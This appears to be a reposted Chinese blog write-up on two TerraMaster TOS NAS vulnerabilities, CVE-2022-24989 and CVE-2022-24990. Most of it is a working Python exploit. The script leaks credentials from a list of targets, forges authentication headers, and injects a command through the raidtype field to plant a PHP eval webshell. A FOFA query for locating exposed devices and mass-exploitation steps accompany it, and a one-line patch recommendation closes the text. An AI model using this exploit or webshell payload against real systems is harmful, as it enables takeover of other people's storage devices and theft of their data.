一、漏洞名稱
TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)
TerraMaster TOS 敏感信息泄露(CVE-2022-24990)
二、影響版本
TerraMaster NAS 4.2.x < 4.2.30
三、漏洞危害
遠程命令執(zhí)行
敏感信息泄露
四、POC & EXP ¤
import time, requests,re,hashlib,json
def usage():
print("""
用法:poc.py
前提:在腳本所在文件夾下放入:host.txt 目標
""")
def poc_getinfo(target):
print("[+]正則檢測:{}".format(target))
headers = {"User-Agent": "TNAS"}
payload = target + "/module/api.php?mobile/webNasIPS"
try:
req = requests.get(url=payload, headers=headers).content.decode("utf-8")
if "successful" in req:
print("[+]存在信息泄露漏洞:{}".format(payload))
print(' [-]泄露信息:' + req)
with open("poc1_vul.txt", "a+", encoding="utf-8") as f:
f.write(payload + '\n')
poc_execute(req,target)
except:
pass
def poc_execute(req,target):
print("[+]開始進行命令執(zhí)行檢測---")
req = str(req)
mac = str(re.findall(r"ADDR:(.*?)\\", req)[0][-6:])
authorization = re.findall(r"PWD:(.*?)\\", req)[0]
timestamp = str(int(time.time()))
signature = hashlib.md5((mac + timestamp).encode("utf-8")).hexdigest()
webshell_name = "qLsvVqr.php" #shell文件名稱
webshell_pass = "ant" #shell密碼
command = 'echo \'<?php @eval($_POST["' + webshell_pass + '"]);?>\'>' + webshell_name
data = {'raidtype': ';'+command, 'diskstring': 'XXXX'}
headers = {"Authorization": authorization, "Signature": signature, "Timestamp": timestamp, "User-Agent": "TNAS"}
payload = target+ '/module/api.php?mobile/createRaid'
req2 = requests.post(url=payload,headers=headers,data=data).content.decode("utf-8")
if "successful" in req2:
print("[+]命令執(zhí)行成功,成功寫入shell文件,文件地址:{}".format(target+'/module/qLsvVqr.php'))
if __name__ == '__main__':
usage()
with open("host.txt", 'r', encoding="utf-8") as f:
temp = f.readlines()
for target in temp: # 此處可以遍歷url文件
target = target.strip().rstrip("/")
poc_getinfo(target)
五、資產搜索
fofa: app=“TERRAMASTER-NAS”
六、漏洞背景 / 參考 / 延申
TerraMaster TOS 可能允許經過身份驗證的遠程攻擊者在系統(tǒng)上執(zhí)行任意命令,這是由 createRaid 模塊中的缺陷引起的。通過發(fā)送特制命令,攻擊者可以利用此漏洞在系統(tǒng)上以 root 身份執(zhí)行任意命令。
七、漏洞復現步驟 ¤
*原理
遠程命令執(zhí)行漏洞是由信息泄露漏所引發(fā)的,借由泄露的信息構造新的header,構造mac
Authorization
Signature
Timestamp
這四個參數,發(fā)送新的請求完成遠程命令執(zhí)行。
* 方法
1、使用fofa搜尋存在漏洞的資產
2、訪問首頁發(fā)現存在漏洞。
3、使用poc上傳shell
4、shell成功執(zhí)行。
八、避坑情況 / 問題匯總
無文章來源:http://www.zghlxwxcb.cn/news/detail-438914.html
九、修復建議
更新至最新版4.2.31 或更高版本文章來源地址http://www.zghlxwxcb.cn/news/detail-438914.html
到了這里,關于TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!